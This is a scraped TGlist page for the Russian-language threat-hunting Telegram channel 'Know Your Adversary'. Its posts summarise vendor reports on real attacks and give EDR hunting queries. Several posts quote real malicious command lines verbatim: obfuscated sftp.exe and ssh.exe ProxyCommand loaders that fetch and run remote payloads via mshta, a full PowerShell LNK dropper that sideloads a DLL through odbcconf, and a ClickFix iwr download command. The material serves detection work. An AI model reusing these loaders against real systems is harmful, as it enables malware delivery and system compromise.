Мир сегодня с "Юрий Подоляка"

Труха⚡️Україна

View

Николаевский Ванёк

View

Мир сегодня с "Юрий Подоляка"

View

Труха⚡️Україна

View

Николаевский Ванёк

View

Know Your Adversary

https://www.knowyouradversary.ru/

TGlist rating

TypePublic

Verification

Not verified

Trust

Not trusted

Location

LanguageOther

Channel creation dateJan 01, 2025

Added to TGlist

Apr 02, 2025

I own this channel

History of changes

Linked chat

Know Your Adversary Chat

Statistic of Telegram Channel Know Your Adversary

More details

Subscribers

417

24 hours00%Week

51.1%Month

328.3%

Citation index

0

Mentions0Shares on channels0Mentions on channels0

Average views per post

96

12 hours670%24 hours96

37.1%48 hours70

34.6%

Engagement rate (ER)

5.71%

Reposts2Comments0Reactions1

Engagement rate by reach (ERR)

16.79%

24 hours0%Week

0.46%Month

3.18%

Average views per ad post

48

1 hour48100%1 – 4 hours00%4 - 24 hours00%

More details

Connect our bot to the channel to find out the gender distribution of this channel's audience.

Total posts in 24 hours

1

Dynamic

Latest posts in group "Know Your Adversary"

All posts

11.05.202507:45

C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]'  -replace ']')

Как и в случае, который мы недавно обсуждали, злоумышленники использовали параметр ProxyCommand для проксирования выполнения команды. И, конечно, мы можем использовать это как маркер для охоты:

event_type: "processcreatewin"

AND

proc_file_name: "sftp.exe"

AND

cmdline: "proxycommand"

Увидимся завтра!

English version

10.05.202514:52

Всем привет!

Злоумышленники всегда стремятся слиться со скомпрометированной инфраструктурой. Мы уже много говорили о различных легитимных инструментах, которые используются хакерами, но во многих случаях им даже не нужно приносить с собой такие инструменты.

Например, согласно отчету Cisco Talos, вымогатели Cactus убеждали жертв запустить сессию удаленного доступа с помощью Microsoft Quick Assist и даже помогали им установить эту программу, если она не была предварительно установлена в системе пользователя.

Такая активность может быть отличной целью для охоты на угрозы. Запрос может быть таким простым:

event_type: "processcreatewin"

AND

proc_file_name: "QuickAssist.exe"

Надеюсь, ваши миссии по Threat Hunting проходят успешно!

Увидимся завтра!

English version

09.05.202513:25

Всем привет!

Вот ещё один любопытный случай злоупотребления легитимным программным обеспечением. Согласно отчёту Synactiv, группировка Hunters International использует KickIdler — легитимную программу для мониторинга сотрудников — чтобы шпионить за жертвой, проводить разведку и похищать учётные данные.

Этот инструмент, например, позволяет злоумышленникам выполнять кейлоггинг, захват экрана, запись звука, удалённое управление, а также предоставляет другие интересные функции с точки зрения атакующего.

Во-первых, можно охотиться за файлами с соответствующей подписью:

event_type: "processcreatewin"

AND

proc_file_sig: "TELE LINK SOFT (TLS) CY LTD"

Далее — запросы DNS, связанные с инструментом:

event_type: "dnsreqwin"

AND

dns_rname: "my.kickidler.com"

Можно также отслеживать создание файлов в связанных директориях:

event_type: "filecreatewin"

AND

file_path: "TeleLinkSoftHelper"

Увидимся завтра!

English version

08.05.202514:04

conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;

Да, с точки зрения детектирования и охоты это очень интересный пример. Например, используется conhost.exe с параметром --headless для запуска скрипта — это хороший кандидат для охоты, хотя потребуется некоторая фильтрация, чтобы исключить легитимную активность:

event_type: "processcreatewin"

AND

proc_file_name: "conhost.exe"

AND

cmdline: "headless"

Ещё одна интересная возможность для детектирования — это использование odbcconf.exe для запуска regsvr32.exe с целью регистрации вредоносной DLL:

event_type: "processcreatewin"

AND

proc_file_name: "odbcconf.exe"

AND

cmdline: "regsvr"

Какие части скрипта показались вам особенно интересными?

Увидимся завтра!

English version

07.05.202515:38

Всем привет!

Продолжаем рассматривать RMM-инструменты, которые наблюдаются в арсенале группировок, распространяющих вымогательское ПО. На этот раз мы посмотрим на Supremo. Это легитимное средство удалённого доступа, которое было замечено в использовании аффилированными с Black Basta злоумышленниками.

Обычно злоумышленники не модифицируют исполняемый файл, поэтому он выглядит абсолютно легитимным. Это значит, что мы снова и снова можем сосредоточиться на метаданных. Вот пример запроса:

event_type: "processcreatewin"

AND

proc_file_productname: "Supremo Remote Control"

То же самое касается событий создания файлов в папках, связанных с инструментом:

event_type: "filecreate"

AND

file_path: "SupremoRemoteDesktop"

Какие ещё интересные RMM-инструменты, используемые операторами вымогателей, вам доводилось видеть?

Увидимся завтра!

English version

Could not access
the media content

06.05.202514:32

Всем привет!

Очередной день — очередной способ обхода EDR. В недавнем отчёте команда реагирования на инциденты Stroz Friedberg компании Aon выявила технику Bring Your Own Installer, которую злоумышленник использовал для обхода и отключения SentinelOne EDR.

Злоумышленник воспользовался легитимным установщиком SentinelOne EDR для запуска процесса обновления агента, но прервал его, завершив процесс msiexec.exe, связанный с обновлением версии SentinelOne.

Если такая возможность ещё есть, можно попытаться отследить подозрительные события завершения процесса msiexec.exe, например, с помощью taskkill:

event_type: "processcreatewin"

AND

proc_file_name: "taskkill"

AND

cmdline: "msiexec"

Увидимся завтра!

English version

05.05.202517:00

Всем привет!

Вчера мы говорили о некоторых новых инструментах, разработанных злоумышленником, известным как Venom Spider. Но давайте немного поговорим о классических инструментах, с которыми он также ассоциируется. Я имею в виду бэкдор more_eggs. Он всё ещё используется — например, вот свежая кампания, о которой пишет Arctic Wolf.

Хочу обратить внимание на следующий поведенческий маркер — msxsl.exe, легитимный бинарный файл, известный как Microsoft Command Line Transformation Utility, используется для запуска бэкдора:

msxsl.exe D30F38D93CA9185.txt D30F38D93CA9185.txt

Мы можем использовать этот маркер для построения поискового запроса:

event_type: "processcreatewin"

AND

proc_file_name: "msxsl.exe"

AND

cmdline: "txt"

А вы замечали использование msxsl.exe в своей инфраструктуре?

Увидимся завтра!

English version

04.05.202511:29

Всем привет!

Продолжаю пополнять свою коллекцию PowerShell! Сегодня утром я читал вот этот отчет и заметил ещё один реальный пример злоупотребления PowerShell для подмены временных меток (timestomping).

Злоумышленник создавал запланированные задачи для запуска MeshAgent, а затем выполнял команды PowerShell для изменения временных меток связанных файлов. Вот примеры:

(Get-Item “.\vcruntime140_1.dll”).LastAccessTime=(“12 May 2024 11:14:00”) `

Например, мы можем использовать события ScriptBlock для охоты на злоупотребление командлетом Get-Item:

event_type: "ScriptExecutionWin"

AND

script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")

Удачной охоты!

Увидимся завтра!

English version

03.05.202512:39

Всем привет!

Insikt Group раскрыла два новых семейства вредоносных программ: TerraStealerV2 и TerraLogger. Оба были приписаны злоумышленнику, известному как Golden Chickens. Этот злоумышленник предоставляет инструменты другим преступникам, работая по модели Malware-as-a-Service (MaaS).

Я ознакомился с отчетом и (как всегда) нашел несколько возможностей для обнаружения.

Например, злоумышленник использовал ssh.exe для проксирования выполнения PowerShell:

ssh.exe -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

Мы можем искать подобную активность с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"

Еще один пример, злоумышленник использует regsvr32.exe для выполнения вредоносного OCX-файла:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок Temp:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"

Еще пример: стилер использует ifconfig[.]me для сбора информации о IP-адресе скомпрометированной системы, мы также можем использовать это для проактивного поиска:

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"

Обязательно ознакомьтесь с отчетом — в нем полно идей для разработки детектирующей логики!

Увидимся завтра!

English version

02.05.202508:14

Всем привет!

Мы уже несколько раз говорили о том, как злоумышленники используют PowerPoint для доставки вредоносного ПО. Пора обсудить это снова!

Seqrite опубликовала отчет о деятельности APT36 (мы отслеживаем этот кластер под названием Translucent Werewolf). Согласно исследованию, злоумышленники использовали файлы надстроек PowerPoint (PPAM) для доставки Crimson RAT.

По моим наблюдениям, такие файлы довольно редки в современных инфраструктурах, поэтому мы можем искать события открытия PPAM-файлов:

event_type: "processcreatewin"

AND

proc_file_name: "powerpnt.exe"

AND

cmdline: "ppam"

Увидимся завтра!

English version

01.05.202512:40

Всем привет!

Читая отчет Trend Micro об Earth Kasha, я заметил любопытный поведенческий маркер ROAMINGMOUSE: он использует WMI для запуска JSLNTOOL.EXE через explorer.exe. JSLNTOOL.EXE — это легитимное приложение, которое злоумышленник использует для сайдлоадинга JSFC.dll — вредоносного загрузчика.

Это означает, что мы можем искать подозрительные запуски explorer.exe через wmiprvse.exe с помощью следующего запроса:

event_type: "processcreatewin"

AND

proc_file_path: "explorer.exe"

AND

proc_p_file_path: "wmiprvse.exe"

Что касается JSLNTOOL.EXE, можно также искать связанные события запуска, обращая внимание на нетипичные расположения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "jslntool.exe"

AND NOT

proc_file_path: "justsystems"

Увидимся завтра!

English version

30.04.202515:40

Всем привет!

Мы всё чаще видим использование инструментов для туннелирования. Настолько часто, что такие утилиты, как ngrok и chisel, сегодня зачастую мгновенно обнаруживаются и блокируются (правда ведь?). Что это значит? Злоумышленники всегда ищут альтернативы!

И одной из таких альтернатив является iox — это инструмент с открытым исходным кодом для проброса портов и проксирования внутри сети. Например, его использовала группа, стоящая за вымогателем Ghost.

Этот инструмент часто применяется для проброса портов RDP и SSH, это мы и можем использовать для поиска:

event_type: "processcreate"

AND

cmdline: "fwd" AND ("22" OR "3389")

Больше информации об инструменте можно найти здесь.

Увидимся завтра!

28.04.202518:36

Всем привет!

Пора снова поговорить о средствах уклонения от защиты, замеченных в атаках программ-вымогателей! На этот раз мы рассмотрим инструментарий группировки Qilin.

Инструмент, на который мы обратим внимание, называется YDArk. Это мощный инструмент для манипуляций с ядром системы, который появился на китайских теневых форумах ещё в 2020 году. Разумеется, злоумышленники используют его для завершения процессов, связанных с антивирусами и решениями EDR.

Как обычно, мы можем использовать оригинальное имя файла для обнаружения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "YDArk.exe"

Также можно сфокусироваться на драйвере, который он использует:

event_type: "driverloadwin"

AND

file_name: "YDArkDrv.sys"

Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!

Увидимся завтра!

English version

23.04.202515:46

Всем привет!

Злоумышленники продолжают использовать легитимные исполняемые файлы для DLL Side-Loading. На этот раз они злоупотребили программами от Trend Micro и Bitdefender.

Согласно отчёту компании Symantec, шпионская группа Billbug использовала исполняемый файл от Trend Micro с именем tmdbglog.exe для сайдлоадинга вредоносной библиотеки tmdglog.dll, а также файл bds.exe от Bitdefender для сайдлоадинга DLL с именем log.dll.

Мы можем охотиться за подозрительной активностью этих исполняемых файлов, ориентируясь на подозрительные имена и расположения:

event_type: "processcreatewin"

AND

proc_file_originalfilename: ("PtWatchDog.exe" OR "BDSubWiz.exe")

Увидимся завтра!

22.04.202515:02

Всем привет!

Мы уже несколько раз говорили о ClickFix. Но интересно наблюдать, как по-разному используется эта техника.

Согласно отчёту Proofpoint, несколько прогосударственных групп начали применять эту технику. Например, TA427 (мы отслеживаем этот кластер активности под именем Monolithic Werewolf). Злоумышленник маскировал вредоносную PowerShell-команду под регистрационный код:

powershell -windowstyle hidden -Command iwr

Как видно, команда включает в себя типичные для вредоносных скриптов командлеты PowerShell, такие как iwr и iex. Разумеется, мы можем использовать это для проактивного поиска (или даже детектирования!):

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("iwr" AND "iex")

А вы наблюдали другие интересные способы применения ClickFix?

Увидимся завтра!

English version

All posts

More details

Records

10.05.202523:59

417Subscribers

11.01.202523:59

0Citation index

22.01.202523:59

445Average views per post

22.01.202523:59

445Average views per ad post

08.02.202523:59

7.07%ER

10.04.202517:52

27.63%ERR

Growth

More details

Subscribers

Citation index

Avg views per post

Avg views per ad post

ERR

More details

Popular posts Know Your Adversary

All posts

09.05.202513:25

event_type: "processcreatewin"

AND

proc_file_sig: "TELE LINK SOFT (TLS) CY LTD"

Далее — запросы DNS, связанные с инструментом:

event_type: "dnsreqwin"

AND

dns_rname: "my.kickidler.com"

Можно также отслеживать создание файлов в связанных директориях:

event_type: "filecreatewin"

AND

file_path: "TeleLinkSoftHelper"

Увидимся завтра!

English version

11.05.202507:45

Всем привет!

Стилеры повсюду! И злоумышленники постоянно находят новые способы доставки. Сегодня посмотрим, как атакующие, распространяющие Lumma Stealer, злоупотребляют SFTP.

Согласно отчёту компании Sophos, злоумышленники распространяли вредоносные LNK-файлы, замаскированные под PDF-документы, которые использовали sftp.exe для выполнения обфусцированной команды:

Как и в случае, который мы недавно обсуждали, злоумышленники использовали параметр ProxyCommand для проксирования выполнения команды. И, конечно, мы можем использовать это как маркер для охоты:

event_type: "processcreatewin"

AND

proc_file_name: "sftp.exe"

AND

cmdline: "proxycommand"

Увидимся завтра!

English version

30.04.202515:40

event_type: "processcreate"

AND

cmdline: "fwd" AND ("22" OR "3389")

Больше информации об инструменте можно найти здесь.

Увидимся завтра!

01.05.202512:40

event_type: "processcreatewin"

AND

proc_file_path: "explorer.exe"

AND

proc_p_file_path: "wmiprvse.exe"

event_type: "processcreatewin"

AND

proc_file_originalfilename: "jslntool.exe"

AND NOT

proc_file_path: "justsystems"

Увидимся завтра!

English version

02.05.202508:14

event_type: "processcreatewin"

AND

proc_file_name: "powerpnt.exe"

AND

cmdline: "ppam"

Увидимся завтра!

English version

06.05.202514:32

event_type: "processcreatewin"

AND

proc_file_name: "taskkill"

AND

cmdline: "msiexec"

Увидимся завтра!

English version

04.05.202511:29

event_type: "ScriptExecutionWin"

AND

script_text: "get-item" AND ("lastaccesstime" OR "lastwritetime" OR "creationtime")

Удачной охоты!

Увидимся завтра!

English version

05.05.202517:00

event_type: "processcreatewin"

AND

proc_file_name: "msxsl.exe"

AND

cmdline: "txt"

А вы замечали использование msxsl.exe в своей инфраструктуре?

Увидимся завтра!

English version

10.05.202514:52

event_type: "processcreatewin"

AND

proc_file_name: "QuickAssist.exe"

Надеюсь, ваши миссии по Threat Hunting проходят успешно!

Увидимся завтра!

English version

03.05.202512:39

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"

Еще один пример, злоумышленник использует regsvr32.exe для выполнения вредоносного OCX-файла:

Мы можем использовать следующий запрос для поиска выполнения OCX-файлов из папок Temp:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"

20.04.202519:15

Всем привет!

Уверен, что все уже слышали о CVE-2025-24054, уязвимости, связанной с раскрытием хеша NTLM через спуфинг.

Check Point опубликовала отчёт с обзором того, как эта уязвимость используется в реальных атаках. Эксплуатация уязвимости происходит с минимальным взаимодействием со стороны пользователя — например, при выборе, просмотре или выполнении любого действия с файлом, кроме его открытия или запуска.

Злоумышленники используют вредоносные файлы с расширением .library-ms, которые распространяются через фишинговые письма. Файлы с таким расширением встречаются довольно редко, поэтому мы можем отследить их появление по событиям создания файлов:

event_type: "filecreate"

AND

file_path: "library-ms"

Увидимся завтра!

English version

08.05.202514:04

Всем привет!

В последнее время я редко вижу, чтобы злоумышленники использовали вредоносные документы. Зато файлы LNK (ярлыки) встречаются всё чаще! Сегодня мы рассмотрим ещё один пример, связанный с группировкой Charming Kitten (мы отслеживаем этот кластер активности под названием Cypress Werewolf).

Итак, вредоносный LNK-файл, распространяемый злоумышленниками, содержал следующую команду:

Да, с точки зрения детектирования и охоты это очень интересный пример. Например, используется conhost.exe с параметром --headless для запуска скрипта — это хороший кандидат для охоты, хотя потребуется некоторая фильтрация, чтобы исключить легитимную активность:

event_type: "processcreatewin"

AND

proc_file_name: "conhost.exe"

AND

cmdline: "headless"

event_type: "processcreatewin"

AND

proc_file_name: "odbcconf.exe"

AND

cmdline: "regsvr"

Какие части скрипта показались вам особенно интересными?

Увидимся завтра!

English version

19.04.202515:17

Всем привет!

Давайте рассмотрим ещё один инструмент, который используют вымогатели для отключения решений AV/EDR. Я говорю о ZammOcide.

Это ещё один пример эксплуатации уязвимого драйвера, на этот раз драйвера Zemana Anti-Malware (zam64.sys). Разумеется, мы можем использовать это для обнаружения:

event_type: "driverloadwin"

AND

file_name: "zam64.sys"

Инструмент также создает сервис с именем "ZammOcide". Это мы тоже можем использовать для обнаружения:

event_type: "serviceinstallwin"

AND

service_name: "ZammOcide"

Конечно, этот инструмент используется в реальных атаках! Например, группой вымогателей CrazyHunter.

Увидимся завтра!

English version

Could not access
the media content

07.05.202515:38

event_type: "processcreatewin"

AND

proc_file_productname: "Supremo Remote Control"

То же самое касается событий создания файлов в папках, связанных с инструментом:

event_type: "filecreate"

AND

file_path: "SupremoRemoteDesktop"

28.04.202518:36

event_type: "processcreatewin"

AND

proc_file_originalfilename: "YDArk.exe"

Также можно сфокусироваться на драйвере, который он использует:

event_type: "driverloadwin"

AND

file_name: "YDArkDrv.sys"

Кроме того, он создаёт службу — это ещё одна возможность для обнаружения!

Увидимся завтра!

English version

C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]' -replace ']')

conhost --headless cmd /c FOR /F "delims=s\ tokens=4" %f IN ('set^|findstr PSM')DO %f -w 1 $zf='osf.zip';$pd='Arda.pdf';$pdl='Arda.lnk';$E=$ENV:Temp;$F=$env:LocalAppData+'\PDFs';if(-not(Test-Path $pdl)){cd $E;$pdl=(dir -recurse *$pdl)[0].fullname;$pd=$E+'\'+[System.IO.Path]::GetFileNameWithoutExtension($pdl)+'.pdf'}$b=[IO.File]::ReadAllBytes($pdl);function f($ar,$su){foreach($i in 0..($ar.Length-$su.Length)){$fo=$true;foreach($j in 0..($su.Length-1)){if($ar[$i+$j] -ne $su[$j]){$fo=$false;break;}}if($fo){return $i;}}return -1;}$i=f $b ([byte[]][char[]]'%PDF');$nb=$b[$i..$b.Length];$s=[System.IO.FileStream]::new($pd,[System.IO.FileMode]::Create);$s.Write($nb,0,($nb.length));$s.close();start $pd;Remove-Item $pdl;mkdir $F -f;copy $pd $F\$zf;Expand-Archive $F\$zf $F\ -f;cd $F;Start-Sleep -Seconds 3;rm $zf;odbcconf /a `{regsvr Wow`} ;